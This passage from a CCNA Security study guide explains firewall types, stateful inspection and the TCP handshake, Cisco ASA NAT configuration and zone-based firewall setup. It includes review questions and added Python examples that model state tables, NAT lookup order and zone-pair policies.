A SOCKS firewall is an example of a circuit-level firewall. This requires a SOCKS client on the computers. Many vendors have integrated their software with SOCKS to make using this type of firewall easier.
A kernel proxy firewall is an example of a fifth-generation firewall. It inspects the packet at every layer of the OSI model but does not introduce the performance hit that an Application layer firewall will, because it does this at the kernel layer. It also follows the proxy model in that it stands between the two systems and creates connections on their behalf.
Proxy servers can be appliances, or they can be software that is installed on a server operating system. These servers act like a proxy firewall in that they create the web connection between systems on their behalf, but they can typically allow and disallow traffic on a more granular basis. For example, a proxy server might allow the Sales group to go to certain websites while not allowing the Data Entry group access to these same sites. The functionality extends beyond HTTP to other traffic types, such as FTP and others.
Proxy servers can provide an additional beneficial function called web caching. When a proxy server is configured to provide web caching, it saves a copy of all web pages that have been delivered to internal computers in a web cache. If any user requests the same page later, the proxy server has a local copy and need not spend the time and effort to retrieve it from the Internet. This greatly improves web performance for frequently requested pages.
Application Firewall
Application-level proxies perform deep packet inspection. This type of firewall understands the details of the communication process at layer 7 for the application of interest. An application-level firewall maintains a different proxy function for each protocol. For example, for HTTP the proxy will be able to read and filter traffic based on specific HTTP commands. Operating at this layer requires each packet to be completely opened and closed, making this firewall the most impactful on performance.
Personal Firewall
Personal firewalls may be those that come with an operating system, like the Windows Firewall, or they may be third-party host firewalls such as Kaspersky Internet Security or ZoneAlarm Pro Firewall. These firewalls, called either host or personal firewalls, protect only the device on which the software is installed.
While never a replacement for properly positioned network firewalls, they are an excellent complement to the protection provided by the network firewalls, and installing both types of firewalls is an example of exercising the concept of defense in depth. This concept prescribes that you should always deploy multiple barriers to unauthorized access.
One key feature that a personal firewall can provide (although in many cases this is not configured by default) is the ability to control egress traffic. This is traffic leaving the device, and controlling it can help to prevent malware that “calls home” to a command-and-control server from functioning. These firewalls can also help protect systems from other systems inside the network perimeter.
Stateful vs. Stateless Firewalls
One key type of firewall that we saved for the end of this chapter is a stateful firewall. Stateful firewalls are those that are aware of the proper functioning of the TCP handshake, keep track of the state of all connections with respect to this process, and can recognize when packets are trying to enter the network that don’t make sense in the context of the TCP handshake. Just as a review, Figure 13.1 shows the process.
FIGURE 13.1 TCP three-way handshake
In this process, a packet should never arrive at a firewall for delivery that has both the SYN flag and the ACK flag set unless it is part of an existing handshake process, and it should be in response to a packet sent from inside the network with the SYN flag set. This is the type of packet that the stateful firewall would disallow. It also can recognize other attack types that attempt to misuse this process. It does this by maintaining a state table about all current connections and the status of each connection process. This allows it to recognize any traffic that doesn’t make sense with the current state of the connection. Of course, maintaining this table and referencing the table causes this firewall type to have more of an effect on performance than a packet filtering firewall.
Operations
Figure 13.2 shows the operation of a stateful firewall.
FIGURE 13.2 Stateful firewall operation
The device C1 on the right is sending a SYN packet to the device H1. The firewall permitted and recorded that operation in its state table and will monitor that table whenever a packet arrives at the firewall to ensure that any packets permitted either are connection requests from the inside (SYN packets only) or are part of an existing connection, and that all rules of the handshake are enforced. For example, in the scenario, a packet from the outside destined for C1 from H1 with an ACK flag set would be rejected because the next expected packet type in the handshake would be a packet with the SYN and ACK flags set.
State Table
The state table is used to monitor all allowed connections. The following are the key items that are typically recorded by a stateful firewall with respect to each connection:
Source IP address
Source port number
Destination IP address
Destination port number
IP protocol
Flags
Timeout
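As an added example that is not part of the study guide, the following Python models the state table just listed and the handshake rules from the Operations scenario: only an inside-initiated SYN opens an entry, the outside peer's SYN/ACK must come before its bare ACK (so the early ACK from H1 is rejected), an unrelated SYN/ACK with no entry is dropped, and idle entries expire on the timeout field. The host names C1 (inside) and H1 (outside), their addresses and the sample packets are constructed for the example.

```python
"""Minimal stateful firewall state table enforcing the TCP three-way handshake.

Added example, not from the study guide. Assumptions: the table records the
chapter's fields (addresses, ports, protocol, flags, timeout); C1 is the
inside host, H1 the outside server, and all packets below are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Tuple

SYN_SENT, SYN_RECEIVED, ESTABLISHED = "SYN_SENT", "SYN_RECEIVED", "ESTABLISHED"
# (inside ip, inside port, outside ip, outside port, protocol)
Key = Tuple[str, int, str, int, str]


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: FrozenSet[str]   # subset of {"SYN", "ACK", "FIN", "RST"}
    direction: str          # "out" = sent from inside, "in" = sent from outside
    time: float
    proto: str = "tcp"


@dataclass
class Entry:
    state: str
    flags: FrozenSet[str]   # flags of the last accepted packet
    last_seen: float


@dataclass
class StatefulFirewall:
    timeout: float = 60.0
    table: Dict[Key, Entry] = field(default_factory=dict)

    @staticmethod
    def key(p: Packet) -> Key:
        """Normalise both directions to (inside, outside) so one entry covers a connection."""
        if p.direction == "out":
            return (p.src, p.sport, p.dst, p.dport, p.proto)
        return (p.dst, p.dport, p.src, p.sport, p.proto)

    def expire(self, now: float) -> None:
        """Drop idle entries; an expired connection must start over with a new SYN."""
        for k in [k for k, e in self.table.items() if now - e.last_seen > self.timeout]:
            del self.table[k]

    def check(self, p: Packet) -> bool:
        """Return True if the packet is permitted, updating the state table as needed."""
        self.expire(p.time)
        k = self.key(p)
        e = self.table.get(k)

        # No entry: only a bare SYN from the inside may open a connection.
        if e is None:
            if p.direction == "out" and p.flags == frozenset({"SYN"}):
                self.table[k] = Entry(SYN_SENT, p.flags, p.time)
                return True
            return False  # SYN/ACK, ACK, or an outside SYN with no context

        # Half-open: exactly one packet type is acceptable next.
        expected = {
            SYN_SENT: ("in", frozenset({"SYN", "ACK"})),   # server's SYN/ACK
            SYN_RECEIVED: ("out", frozenset({"ACK"})),     # client's final ACK
        }
        if e.state in expected:
            direction, flags = expected[e.state]
            if p.direction == direction and p.flags == flags:
                e.state = SYN_RECEIVED if e.state == SYN_SENT else ESTABLISHED
                e.flags, e.last_seen = p.flags, p.time
                return True
            if "RST" in p.flags:            # either side may abort a half-open connection
                del self.table[k]
                return True
            return False                    # e.g. a bare ACK while a SYN/ACK is expected

        # Established: data flows both ways; FIN or RST tears the entry down.
        e.flags, e.last_seen = p.flags, p.time
        if p.flags & {"FIN", "RST"}:
            del self.table[k]
        return True


def run_scenario() -> List[bool]:
    """The chapter's scenario: C1 (inside, 10.0.2.10) opens a connection to H1 (outside)."""
    fw = StatefulFirewall(timeout=60.0)
    c1, h1 = "10.0.2.10", "203.0.113.5"                  # constructed addresses
    syn, synack, ack = frozenset({"SYN"}), frozenset({"SYN", "ACK"}), frozenset({"ACK"})
    return [
        fw.check(Packet(c1, 40000, h1, 443, syn, "out", 0.0)),     # C1 -> H1 SYN: permitted
        fw.check(Packet(h1, 443, c1, 40000, ack, "in", 0.1)),      # H1 -> C1 ACK: rejected
        fw.check(Packet(h1, 443, c1, 40000, synack, "in", 0.2)),   # H1 -> C1 SYN/ACK: permitted
        fw.check(Packet(c1, 40000, h1, 443, ack, "out", 0.3)),     # C1 -> H1 ACK: established
        fw.check(Packet(h1, 443, c1, 40001, synack, "in", 0.4)),   # unrelated SYN/ACK: rejected
    ]


if __name__ == "__main__":
    print(run_scenario())
```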
Summary
In this chapter, you learned about various firewall technologies such as proxy, application, personal, and stateful firewalls. You learned their strengths and weaknesses. You also learned about stateful firewalls in greater detail and described the relationship between the operation of these firewalls and the TCP three-way handshake. Finally, you learned what is contained in the state table of a stateful firewall.
Exam Essentials
Identify the operational strengths and weaknesses of firewall technologies. These include proxy, application, personal, and stateful firewalls. Describe each technology’s impact on performance and the features that each provides.
Describe the relationship between the TCP three-way handshake and stateful firewalls. Stateful firewalls understand the three-way handshake and can recognize illegal packets that don’t make sense in the TCP connection process.
Identify contents of a state table. Key items that are typically recorded by a stateful firewall with respect to each connection are source port number, destination IP address, destination port number, IP protocol, flags, and timeout.
Review Questions
1. Which firewall technology is the least detrimental to performance?
A. Proxy
B. Stateful
C. Packet filtering
D. SOCKS
2. Which firewall type operates at the session layer?
A. Circuit-level proxy
B. Stateful
C. Packet filtering
D. SOCKS
3. Which statement is true of a kernel-level proxy?
A. Operates at the Transport layer
B. Considered a fifth-generation firewall
C. Maintains a state table
D. Examines only the header
4. Which of the following is not a proxy firewall?
A. Kernel
B. Circuit-level
C. SOCKS
D. Application
5. Which type of firewall is ZoneAlarm Pro Firewall?
A. Personal
B. Stateful
C. Packet filtering
D. SOCKS
6. Which value for each connection is not contained in the state table of a stateful firewall?
A. Destination MAC address
B. Source IP address
C. Destination IP address
D. Flags
7. You have selected a firewall that performs deep packet inspection but also creates a performance hit on throughput. What type did you select?
A. Personal
B. Application level
C. Packet filtering
D. SOCKS
8. Which also offers the benefit of web page caching?
A. Personal firewalls
B. Application-level firewalls
C. Proxy servers
D. SOCKS firewalls
9. At what layer of the OSI model do circuit-level proxies operate?
A. Network
B. Transport
C. Application
D. Session
10. Which of the following is most susceptible to IP spoofing attacks?
A. Packet-filtering firewalls
B. Application-level firewalls
C. Proxy servers
D. SOCKS firewalls
11. Which of the following will be able to read and filter traffic based on specific HTTP commands?
A. Packet-filtering firewalls
B. Application-level firewalls
C. Proxy servers
D. SOCKS firewalls
12. What is the only legitimate response to a packet with the SYN flag set?
A. SYN/FIN
B. ACK
C. SYN/ACK
D. FIN
13. A packet was just received with the SYN/ACK flags set. What data structure will a stateful firewall use to determine whether this packet is allowed?
A. ARP cache
B. Routing table
C. DNS resolver cache
D. State table
14. Installing both personal and network firewalls is an example of exercising what concept?
A. Defense in depth
B. Separation of duties
C. Least privilege
D. Need to know
15. A SOCKS firewall is an example of which firewall technology?
A. Packet-filtering firewalls
B. Circuit-level firewall
C. Proxy servers
D. Stateful firewalls
16. Which traffic type would be accepted by a stateful firewall?
A. A SYN/ACK packet that is not related to a current connection
B. An ACK packet that is in response to a SYN packet in a current connection setup
C. A SYN/ACK packet in response to a SYN packet in a current connection setup
D. An ACK packet that is not related to a current connection
17. Which of the following is not a proxy firewall?
A. SOCKS firewalls
B. Circuit-level firewalls
C. Stateful firewalls
D. Kernel-level firewalls
18. Which statement is not true of personal firewalls?
A. May be those that come with an operating system like the Windows Firewall or may be third-party hosted firewalls
B. Protect only the device on which the software is installed
C. Can control egress traffic
D. Can be a replacement for properly positioned network firewalls
19. Which firewall technology is the most detrimental to performance?
A. Application level
B. Stateful
C. Packet filtering
D. SOCKS
20. Which firewall type operates at the Network and Transport layers?
A. Circuit-level proxy
B. Packet filtering
C. Stateful
D. SOCKS
Chapter 14 Configuring NAT and Zone-Based Firewalls
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
5.3 Implement NAT on Cisco ASA 9.x
Static
Dynamic
PAT
Policy NAT
Verify NAT operations
5.4 Implement zone-based firewall
Zone to zone
Self-zone
Network Address Translation (NAT) is a feature found in firewalls and many router platforms that allows for the translation of private IP addresses to public IP addresses at the network edge. While one of the driving forces behind the development of NAT was the conservation of public IPv4 address space, NAT also has a security component in that the process helps to hide the interior addressing scheme. Zone-based firewalling is an approach that makes traffic filtering decisions between zones rather than by specific IP addresses. In this chapter, you will learn how to implement several types of NAT and configure zone-based firewalling.
In this chapter, you will learn the following:
How to implement NAT on Cisco ASA 9.x platforms
How to implement zone-based firewalls
Implementing NAT on ASA 9.x
There are three types of NAT that can be implemented. This section discusses how these three types operate, and you'll learn how to implement each type on the Adaptive Security Appliance (ASA).
In static NAT, each private IP address is mapped to a public IP address. While this does not save any of the public IPv4 address space, it does have the benefit of hiding your internal network address scheme from the outside world.
In dynamic NAT, a pool of public IP addresses is obtained that is at least equal to the number of private IP addresses that require translation. However, rather than statically mapping each private IP address to a fixed public IP address, the NAT device assigns public IP addresses from the pool on a dynamic basis, much like a DHCP server does when assigning IP addresses.
Finally, Port Address Translation (PAT) is a form of NAT in which all private IP addresses are mapped to a single public IP address. This provides both benefits of saving the IPv4 address space and hiding the network address scheme. This system is called PAT because the ephemeral port numbers that devices choose as the source port for a connection (which are chosen randomly from the upper ranges of the port numbers) are used to identify each source computer in the network. This is required since all devices are mapped to the same public IP address.
When configuring NAT on the ASA, you need to understand that it uses an object-oriented approach. In other words, an object is created for each host, for each translated address, and for each service that is used in the translation process. Translations are configured as network objects. A network object is defined as a single address or as a network ID.
The resulting host or network defined in a network object is used to represent the private IP address prior to translation. When ACLs are used to define traffic allowed from a lower-security interface to a higher-security interface, these pretranslation objects are referenced.
The ASA uses a NAT table to hold the translations. This table has three sections. When an outgoing packet arrives at the ASA, the sections are read from top to bottom, and the first translation match is applied. The three sections are as follows:
Manual NAT This contains translations that have been defined to be applied by the appliance before the other sections are consulted. These translations are typically very specific and may indicate a translation on both the source and destination IP addresses.
Auto NAT This section, also called object NAT, contains translations that are defined on the object itself. These translations, one for each object, are typically either static translations for servers that must be reached from the outside world (and always require the same public IP address) or dynamic translations for clients trying to reach the Internet.
Manual NAT after Auto NAT This contains more general translations not handled by the first two sections. These are used only when no translation matches in the first two sections.
If a packet doesn't match any of the mappings found in any of the three sections, the packet is sent untranslated.
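The three-section, first-match walk just described can be modelled in a few lines. The following is an added example written for this section, not Cisco code, and it does not reproduce the ASA's matching engine: within one section it simply keeps configuration order, whereas the real Auto NAT section orders its rules itself (static before dynamic, then by prefix length), which is not modelled here. Rule names, addresses and the "interface" pool label are constructed for the example.

```python
"""Model of the ASA NAT table's three-section lookup order (added example)."""
from ipaddress import ip_address, ip_network


class NatRule:
    def __init__(self, name, real, mapped, destination=None):
        self.name = name
        self.real = ip_network(real)         # pretranslation ("real") object
        self.mapped = mapped                 # mapped address, pool or "interface"
        # Manual NAT rules may also match on the destination; Auto NAT cannot.
        self.destination = ip_network(destination) if destination else None

    def matches(self, src, dst):
        if ip_address(src) not in self.real:
            return False
        return self.destination is None or ip_address(dst) in self.destination


class NatTable:
    SECTIONS = ("manual", "auto", "manual_after_auto")   # read top to bottom

    def __init__(self):
        self.sections = {s: [] for s in self.SECTIONS}

    def add(self, section, rule):
        if section == "auto" and rule.destination is not None:
            raise ValueError("Auto (object) NAT cannot match on destination")
        self.sections[section].append(rule)

    def lookup(self, src, dst):
        """Walk the sections top to bottom; return (section, rule, mapped)
        for the first match, or None when the packet goes untranslated."""
        for section in self.SECTIONS:
            for rule in self.sections[section]:
                if rule.matches(src, dst):
                    return section, rule.name, rule.mapped
        return None


def build_sample_table():
    """Constructed rule set that exercises every section."""
    t = NatTable()
    # Manual (policy) NAT: applies only when the host talks to one partner network.
    t.add("manual", NatRule("partner-only", "10.1.1.50/32", "203.0.113.50",
                            destination="198.51.100.0/24"))
    # Auto/object NAT: a static mapping for a server and PAT for the clients.
    t.add("auto", NatRule("web-server-static", "10.1.1.50/32", "203.0.113.5"))
    t.add("auto", NatRule("clients-pat", "10.1.1.0/24", "interface"))
    # Catch-all manual rule that is consulted only after Auto NAT.
    t.add("manual_after_auto", NatRule("everything-else", "10.0.0.0/8", "203.0.113.99"))
    return t
```

The same source host 10.1.1.50 is translated differently depending on the destination: the Manual NAT rule wins for the partner network, the Auto NAT static rule wins everywhere else, and a host outside every rule's real network goes out untranslated.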
Static
To configure a static NAT translation, follow the steps in the next procedure.
Configuring Static NAT
In this procedure, you will create a static NAT mapping for a device.
1. Connect to the ASA using the Adaptive Security Device Manager (ASDM).
2. Navigate to Configuration > Firewall > Network Objects > Groups. Select Add Network Object. Define the parameters of this object. Enter the type and the IP address of the device to be translated with the static mapping. Ensure that this is the pretranslation IP address.
3. In the NAT section of the Add Network Object dialog box, select the Add Automatic Address Translation Rules check box and select Static as the type in the drop-down box just below the Add Automatic Address Translation Rules check box.
4. Just below the drop-down box where you select Static is the Translated Addr field. In the Translated Addr field, click the Browse button. You can browse for objects that have been created here, but you will be creating a new object, so click the Add button at the top of the page.
5. When the Add Network Object dialog box appears, enter a name for the translated object and the address type and public IP address to which the device should be translated. Then click OK.
6. Back on the Add Network Object page where you defined the pretranslation information, click the Advanced button in the NAT section. In the Advanced NAT Settings dialog box, select the source interface for the translation and the destination interface. These will be network objects that would need to have been created previously to represent the internal and external interfaces on the ASA. You will choose these from a drop-down box.
7. Click OK and then Apply. The configuration is now complete.
Dynamic
To configure dynamic NAT translation, follow the steps in the next procedure.
Configuring Dynamic NAT
1. Connect to the ASA using the ASDM.
2. Navigate to Configuration > Firewall > Network Objects > Groups. Select Add Network Object. Define the parameters of this object. Enter the type and the IP address of the device to be translated with the dynamic mapping. Ensure that this is the pretranslation IP address.
3. In the NAT section of the Add Network Object dialog box, select the Add Automatic Address Translation Rules check box and select Dynamic as the type in the drop-down box just below the Add Automatic Address Translation Rules check box.
4. Just below the drop-down box where you select Dynamic is the Translated Addr field. In the Translated Addr field, click the Browse button. You can browse for objects that have been created here, but you will be creating a new object, so click the Add button at the top of the page.
5. In this case, the object you will be creating will be a range of public IP addresses, which you will name TranslatedPool. Enter a range of addresses using the Start Address and End Address fields. While you are creating only one mapping to the pool in this exercise, in the real world ensure that you have enough public IP addresses in the pool for the private addresses to be translated.
6. Back on the Add Network Object page where you defined the pretranslation information, choose the new network object by double-clicking it and then click the Advanced button in the NAT section. In the Advanced NAT Settings dialog box, select the source interface for the translation and the destination interface. These will be network objects that would need to have been created previously to represent the internal and external interfaces on the ASA. You will choose these from a drop-down box.
7. Click OK and then Apply. The configuration is now complete.
PAT
To configure PAT translation, follow the steps in the next procedure.
Configuring PAT
1. Connect to the ASA using the ASDM.
2. Navigate to Configuration > Firewall > Network Objects > Groups. Select Add Network Object. Define the parameters of this object. Enter the type and the IP address of the device to be translated with the PAT mapping. Ensure that this is the pretranslation IP address.
3. In the NAT section of the Add Network Object dialog box, select the Add Automatic Address Translation Rules check box and select Dynamic PAT (Hide) as the type in the drop-down box just below the Add Automatic Address Translation Rules check box.
4. In this case, you are not mapping to an individual IP address or to a pool of IP addresses; you will be mapping to the Internet-facing interface of the ASA. When you do this with PAT (Hide) selected, all mappings will use the public address configured on that Internet interface. Use the Browse button to browse to the Internet-facing interface on the ASA. If an object has not been created for the interface, do so now by specifying its public IP address.
5. Back on the Add Network Object page where you defined the pretranslation information, choose the new network object by double-clicking it and then clicking the Advanced button in the NAT section. In the Advanced NAT Settings dialog box, select the source interface for the translation and the destination interface. These will be network objects that would need to have been created previously to represent the internal and external interfaces of the ASA. You will choose these from a drop-down box.
6. Click OK and then Apply. The configuration is now complete.
Policy NAT
In some scenarios, you may need more options than are available with Auto NAT (as you will see in the next procedure), or you may need to specify exceptions to the Auto NAT rules. By using the Manual NAT section, these options will be available to you. This section also has the advantage of being checked for a translation match before the other two sections. When you do this, it is also called Policy NAT. It is also sometimes called Twice NAT because the same rule can perform translation in both directions (translating not only the address of the device inside the network outgoing but also the IP address of the exterior device incoming).
In the scenario you will use in the next procedure, you will use Policy NAT to create a mapping for an internal device that is effective only when the internal device is communicating with one specific exterior device and not effective otherwise.
To configure Policy NAT to support this scenario, follow the steps in the next procedure.
Configuring Policy NAT
1. Connect to the ASA using the ASDM.
2. Navigate to Configuration > Firewall > Objects > Network Objects/Groups. Select Add Network Object.
3. Create three network objects: one for the private IP address of the internal device, one for the public IP address to which the internal device will be mapped, and one for the private IP address to which the external device will be mapped incoming. Define the parameters of each object. When you are finished, click Apply.
4. Now you will define the manual translation that will apply only between these two systems. Navigate to Configuration > Firewall > NAT Rules.
5. The NAT Rules table appears. When you configure manual NAT entries, they can be applied either before or after Network Object NAT rules such as those you configured in the earlier procedures. In this case, you want this rule to apply before those rules do, so click Add and then Add NAT Rule Before "Network Object" NAT Rules. The Add NAT Rule box appears.
6. The top section of the Add NAT Rule dialog box is where you configure how the packet will be identified for translation using this rule. In the Source Interface field, select Any from the drop-down box, and in the Source Address field use the drop-down box to select the object you created in step 3 representing the private IP address of the internal device.
7. In the Destination Interface field, select Any from the drop-down box, and in the Destination Address field use the drop-down box to select the object you created in step 3 representing the public IP address of the external device.
8. Now that you have defined the match parameters for the translation, you need to configure the translation. In the Action: Translated Packet section, in the Source NAT Type drop-down box, select Static. In the Source Address drop-down box, select the object you created in step 3 representing the public IP address to which the internal device should be translated. In the Destination Address field, select Original from the drop-down box.
9. Select OK and then Apply. The configuration is now complete.
Verifying NAT Operations
There are several ways to verify that NAT is operating correctly. They include viewing the NAT translations in the translation table using the show xlate command, and in cases where you are not getting any NAT translations, you can view the configuration and check for errors using the show nat command.
Viewing Translations
Using the show xlate command on an ASA on which PAT has been configured, you can see in the following output that three translations have occurred. As PAT is in use, all three have received the same public IP address.
hostname# show xlate
3 in use, 3 most used
PAT Global 103.61.3.9(0) Local 10.1.1.15 ICMP id 340
PAT Global 103.61.3.9(1024) Local 10.1.1.15(1028)
PAT Global 103.61.3.9(1024) Local 10.1.1.15(516)
The following is sample output from the show xlate detail command. It shows the translation type and interface information with three active PATs.
The r flag indicates that the translation is PAT. The i flag indicates that the translation applies to the inside address port.
hostname# show xlate detail
3 in use, 3 most used
Flags: D - DNS, d - dump, I - identity, i - inside, n - no random,
       r - portmap, s - static
TCP PAT from inside:10.1.1.15/1026 to outside:103.61.3.9/1024 flags ri
UDP PAT from inside:10.1.1.15/1028 to outside:103.61.3.9/1024 flags ri
ICMP PAT from inside:10.1.1.15/21505 to outside:103.61.3.9/0 flags ri
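When verifying NAT on more than a handful of translations, it helps to parse this output rather than read it by eye. The following parser is an added example for this section (not Cisco code or tooling); the embedded SAMPLE is the show xlate detail output reproduced above, and the parser decodes each translation line and its flag letters against the legend the command prints, so the r (portmap, i.e. PAT) and i (inside) flags can be checked programmatically.

```python
"""Parser for ASA 'show xlate detail' output (added example)."""
import re
from collections import Counter

# Legend as printed by the command; unknown letters are reported as such.
FLAG_LEGEND = {"D": "DNS", "d": "dump", "I": "identity", "i": "inside",
               "n": "no random", "r": "portmap", "s": "static"}

LINE_RE = re.compile(
    r"^(?P<proto>TCP|UDP|ICMP)\s+(?P<kind>PAT|NAT)\s+from\s+"
    r"(?P<real_if>[^:\s]+):(?P<real_ip>[\d.]+)/(?P<real_port>\d+)\s+to\s+"
    r"(?P<mapped_if>[^:\s]+):(?P<mapped_ip>[\d.]+)/(?P<mapped_port>\d+)"
    r"\s+flags\s+(?P<flags>\S+)$"
)

# The output shown in the chapter, embedded here as the parser's input.
SAMPLE = """\
hostname# show xlate detail
3 in use, 3 most used
Flags: D - DNS, d - dump, I - identity, i - inside, n - no random,
       r - portmap, s - static
TCP PAT from inside:10.1.1.15/1026 to outside:103.61.3.9/1024 flags ri
UDP PAT from inside:10.1.1.15/1028 to outside:103.61.3.9/1024 flags ri
ICMP PAT from inside:10.1.1.15/21505 to outside:103.61.3.9/0 flags ri
"""


def parse_xlate_detail(text):
    """Return one dict per translation line; prompt, counters and legend
    lines do not match LINE_RE and are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        e = m.groupdict()
        # For ICMP the "port" field carries the ICMP identifier, not a port.
        e["real_port"] = int(e["real_port"])
        e["mapped_port"] = int(e["mapped_port"])
        e["flag_names"] = [FLAG_LEGEND.get(f, "unknown(%s)" % f) for f in e["flags"]]
        e["is_pat"] = "r" in e["flags"]          # r = portmap, i.e. PAT
        entries.append(e)
    return entries


def mapped_address_counts(entries):
    """How many translations share each mapped (global) address. With PAT
    in use they all collapse onto the same public IP."""
    return Counter(e["mapped_ip"] for e in entries)


def non_pat_entries(entries):
    """Translations without the r flag, i.e. ones that are not port-mapped."""
    return [e for e in entries if not e["is_pat"]]
```

On the sample, all three entries decode to the flags portmap and inside, every one is PAT, and the single mapped address 103.61.3.9 carries all three translations, which is exactly what the prose above says you should see.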
Viewing the Configuration
Using the show nat command, you can view the configuration. In the following output, there is a single static translation configured on the inside interface that translates the host at 192.168.5.6 to 128.10.6.2. You can also see that there have been no translations (hits) in either direction using this configuration.
hostname(config)# show nat
NAT policies on Interface inside:
  match ip inside host 192.168.5.6 outside any
    static translation to 128.10.6.2
    translate_hits = 0, untranslate_hits = 0
Configuring Zone-Based Firewalls
Zones are collections of networks reachable over a router interface. Zone pairs are used to define a unidirectional firewall policy. The direction is indicated by specifying the source and destination zones. There is one special type of zone that will be covered in a later section.
When zone-based firewalling is used, each interface (including both physical and virtual interfaces) is assigned to a zone, and a policy is applied to traffic moving between zones. These configurations use a syntax known as the Cisco Common Classification Policy Language. When using the Cisco Common Classification Policy Language, class maps are used to define traffic classes, and policy maps are used to apply policies (actions) to these traffic classes. Finally, service policies are used to activate policy maps on zone pairs.
While only a single service policy can be used on a zone pair, the policy maps within can include multiple class maps. These class maps will be checked for a traffic match in the order in which they are configured. If a match is not found in the first map, the second will be consulted. When there are no matches, the default policy will be applied to the traffic. Figure 14.1 shows this logic.
FIGURE 14.1 Multiple class maps
Moreover, these class maps can be used in more than one service policy. In Figure 14.2, two class maps have been created, and they have both been used in two different service policies.
FIGURE 14.2 Reuse of class maps
Class Maps
Class maps have two parts; the first identifies the traffic, and the second specifies an action. A match statement is used to specify the traffic and can match traffic based on the following:
An ACL
A protocol
Another class map
The actions that can be applied are defined using action statements. The actions can be as follows:
Inspect: Triggers stateful packet inspection
Drop: Denies traffic
Pass: Permits traffic
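The ordered class-map check, the three actions and the zone-pair lookup can be tied together in a small model. This is an added example for this section, not IOS code: class maps here match on protocol only (the match-any form; ACL and nested class-map matches are not modelled), and the default outcomes for unzoned interfaces and for zones without a pair are the IOS zone-based firewall defaults as this example's author understands them, since the book's Figure 14.3 is not reproduced on this page. The interface names and the HTTP_FTP_filter/DMZ_inspect names are the ones used in the chapter's own procedure later on.

```python
"""Model of zone-based firewall policy evaluation (added example)."""


class ClassMap:
    def __init__(self, name, protocols):
        self.name = name
        self.protocols = set(protocols)        # "match protocol ..." lines

    def matches(self, pkt):
        return pkt["protocol"] in self.protocols


class PolicyMap:
    ACTIONS = ("inspect", "drop", "pass")

    def __init__(self, name, default_action="drop"):
        self.name = name
        self.entries = []                      # (class map, action) in config order
        self.default_action = default_action   # action of class-default

    def add_class(self, class_map, action):
        if action not in self.ACTIONS:
            raise ValueError("unknown action %r" % action)
        self.entries.append((class_map, action))

    def evaluate(self, pkt):
        """First class map that matches wins; otherwise class-default."""
        for class_map, action in self.entries:
            if class_map.matches(pkt):
                return class_map.name, action
        return "class-default", self.default_action


class ZoneFirewall:
    def __init__(self):
        self.zone_of = {}      # interface -> zone
        self.pairs = {}        # (source zone, destination zone) -> PolicyMap or None

    def zone_member(self, interface, zone):
        self.zone_of[interface] = zone

    def zone_pair(self, source, destination, policy=None):
        self.pairs[(source, destination)] = policy

    def evaluate(self, ingress, egress, pkt):
        """Decide the fate of a packet entering on `ingress` and leaving on
        `egress`; returns (reason, action). The default branches below are
        the assumed IOS defaults, not rules quoted from the book."""
        src, dst = self.zone_of.get(ingress), self.zone_of.get(egress)
        if src is None and dst is None:
            return "no-zones", "pass"          # neither interface is zoned
        if src is None or dst is None:
            return "zone-to-unzoned", "drop"   # one side zoned, the other not
        if src == dst:
            return "intra-zone", "pass"        # same zone is not policed
        if (src, dst) not in self.pairs:
            return "no-zone-pair", "drop"      # inter-zone without a pair
        policy = self.pairs[(src, dst)]
        if policy is None:
            return "pair-without-policy", "drop"
        return policy.evaluate(pkt)


def build_chapter_config():
    """The chapter's scenario: inspect HTTP/FTP from outside into the DMZ."""
    fw = ZoneFirewall()
    fw.zone_member("gi0/1", "inside")
    fw.zone_member("gi0/2", "outside")
    fw.zone_member("gi0/3", "dmz")
    http_ftp = ClassMap("HTTP_FTP_filter", ["http", "ftp"])
    dmz_inspect = PolicyMap("DMZ_inspect")
    dmz_inspect.add_class(http_ftp, "inspect")
    fw.zone_pair("outside", "dmz", dmz_inspect)
    return fw
```

Note that the pair is unidirectional: HTTP from outside to the DMZ is inspected, but the same protocol from the DMZ toward the outside zone has no pair and is dropped, and any protocol the class map does not list falls through to class-default.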
Default Policies
When no class map matches the traffic type, the default policy is invoked. This policy's actions depend on whether the interface has been assigned to a zone and, if so, what policy is currently in effect for that zone pair if it exists. Sound complicated? It can be. Figure 14.3 shows the rules.
FIGURE 14.3 Default policies
Figure 14.3 applies to traffic that is not coming from or destined to the router (self-zone). When the traffic is coming from or destined to the router, the rules are as shown in Figure 14.4.
FIGURE 14.4 Default policies (self-zone)
Understanding the Self-Zone
The self-zone is a special zone that has no interface members. It applies to any traffic destined for the router rather than traffic that the router is routing. An example of this type of traffic would be traffic to manage the device using SSH. It also applies to traffic generated by the router. The traffic going from the router back to the device making the SSH connection to manage the device would be an example of such router-generated traffic.
Configuring Zone-to-Zone Access
The firewall you will use in the following procedure has three interfaces: one connected to the Internet, one connected to the LAN, and another connected to the DMZ. To configure zone-based policies to support this scenario, follow the steps in the next procedure.
Configuring Zone-Based Firewall
In this procedure, you will configure a policy that performs stateful inspection of HTTP and FTP traffic coming to the DMZ from the Internet.
1. Define three security zones: Inside, Outside, and DMZ. Use the following commands to do so:
RTR64(config)# zone security inside
RTR64(config)# zone security outside
RTR64(config)# zone security dmz
2. Assign each interface to its proper zone.
RTR64(config)# int gi0/1
RTR64(config-if)# zone-member security inside
RTR64(config)# int gi0/2
RTR64(config-if)# zone-member security outside
RTR64(config)# int gi0/3
RTR64(config-if)# zone-member security dmz
3. Create a class map that defines the traffic. In this case, that traffic will be HTTP or FTP. The map will be named HTTP_FTP_filter and will be used to perform stateful inspection of the HTTP and FTP traffic.
RTR64(config)# class-map type inspect match-any HTTP_FTP_filter
RTR64(config-cmap)# match protocol http
RTR64(config-cmap)# match protocol ftp
4. Define a policy map named DMZ_inspect that specifies the action for traffic that matches the HTTP_FTP_filter class map.
RTR64(config)# policy-map type inspect DMZ_inspect
RTR64(config-pmap)# class type inspect HTTP_FTP_filter
RTR64(config-pmap-c)# inspect
5. Define a zone pair called outside_to_DMZ with the outside zone being the source and the DMZ zone being the destination.
RTR64(config)# zone-pair security outside_to_DMZ source outside destination dmz
6. Apply the DMZ_inspect policy to the zone pair called outside_to_DMZ.
RTR64(config-sec-zone-pair)# service-policy type inspect DMZ_inspect
The configuration is now complete.
Summary
